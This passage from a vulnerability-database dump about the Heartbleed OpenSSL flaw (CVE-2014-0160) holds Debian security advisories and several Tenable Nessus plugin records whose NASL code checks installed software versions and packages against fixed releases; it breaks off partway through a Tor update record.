updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-04-08T13:47:33", "title": "[SECURITY] [DSA 2896-2] openssl security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:48:43", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T13:47:33", "id": "DEBIAN:DSA-2896-2:FEB91", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00072.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-18T13:49:19", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u5", "arch": "all", "packageFilename": "openssl_1.0.1e-2+deb7u5_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\nDebian Bug : 743883\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker This vulnerability might allow an\nattacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-04-07T21:37:07", "title": "[SECURITY] [DSA 2896-1] openssl security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:19", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-07T21:37:07", "id": "DEBIAN:DSA-2896-1:7AEC1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00071.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:18:15", "references": ["https://www.stunnel.org/?page=sdf_ChangeLog", "https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "http://www.nessus.org/u?52a6ced6", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "pluginID": "73500", "description": "The version of stunnel installed on the remote host is prior to\nversion 5.01. It is, therefore, affected by an information disclosure\nvulnerability in the bundled OpenSSL DLLs. A remote attacker can read\nthe contents of up to 64KB of server memory, potentially exposing\npasswords, private keys, and other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2014-04-14T00:00:00", "title": "stunnel < 5.01 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:stunnel:stunnel"], "id": "STUNNEL_5_01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73500", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73500);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"stunnel < 5.01 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks version of stunnel.exe.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a program that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of stunnel installed on the remote host is prior to\nversion 5.01. It is, therefore, affected by an information disclosure\nvulnerability in the bundled OpenSSL DLLs. A remote attacker can read\nthe contents of up to 64KB of server memory, potentially exposing\npasswords, private keys, and other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.stunnel.org/?page=sdf_ChangeLog\");\n # https://www.stunnel.org/pipermail/stunnel-announce/2014-April/000075.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52a6ced6\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to stunnel version 5.01 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:stunnel:stunnel\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"stunnel_installed.nasl\");\n script_require_keys(\"installed_sw/stunnel\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'stunnel';\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nversion = install[\"version\"];\npath = install[\"path\"];\n\n# Affected < 5.01\nif (\n version =~ \"^[0-4]($|[^0-9])\" ||\n version =~ \"^5\\.00($|[^0-9])\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.01\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:14", "references": ["https://www.redhat.com/security/data/cve/CVE-2014-0160.html", "http://rhn.redhat.com/errata/RHSA-2014-0376.html"], "pluginID": "73396", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 5, "reporter": "Tenable", "published": "2014-04-08T00:00:00", "title": "RHEL 6 : openssl (RHSA-2014:0376)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-06-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:openssl-devel"], "id": "REDHAT-RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73396", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73396);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/14 00:01:15 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"RHEL 6 : openssl (RHSA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:14", "references": ["https://oss.oracle.com/pipermail/el-errata/2014-April/004065.html"], "pluginID": "73395", "description": "From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 5, "reporter": "Tenable", "published": "2014-04-08T00:00:00", "title": "Oracle Linux 6 : openssl (ELSA-2014-0376)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-06-14T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-static", "p-cpe:/a:oracle:linux:openssl-perl"], "id": "ORACLELINUX_ELSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73395", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# Oracle Linux Security Advisory ELSA-2014-0376 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73395);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/14 00:01:15 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"Oracle Linux 6 : openssl (ELSA-2014-0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-April/004065.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:19:30", "references": ["https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "http://www.nessus.org/u?d9ffb6dc", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "pluginID": "77024", "description": "The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 8, "reporter": "Tenable", "published": "2014-08-06T00:00:00", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/a:hp:version_control_agent"], "id": "HP_VCA_SSRT101531.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77024", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77024);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/12 19:01:17\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_version_control_agent_installed.nbin\");\n script_require_keys(\"installed_sw/HP Version Control Agent\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"HP Version Control Agent\";\nget_install_count(app_name:app,exit_if_zero:TRUE);\n\n# Only one install possible for this software\ninstalls = get_installs(app_name:app);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST,app);\n\ninstall = installs[1][0];\nversion = install[\"version\"];\npath = install[\"path\"];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,app);\n\nfix = \"7.3.2\";\nif (\n version =~ \"^7\\.2\\.[0-2]\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port,extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:55", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=878486", "https://lists.opensuse.org/opensuse-updates/2014-05/msg00079.html"], "pluginID": "75376", "description": "- tor 0.2.4.22 [bnc#878486] Tor was updated to the\n recommended version of the 0.2.4.x series.\n\n - major features in 0.2.4.x :\n\n - improved client resilience\n\n - support better link encryption with forward secrecy\n\n - new NTor circuit handshake\n\n - change relay queue for circuit create requests from\n size-based limit to time-based limit\n\n - many bug fixes and minor features\n\n - changes contained in 0.2.4.22: Backports numerous\n high-priority 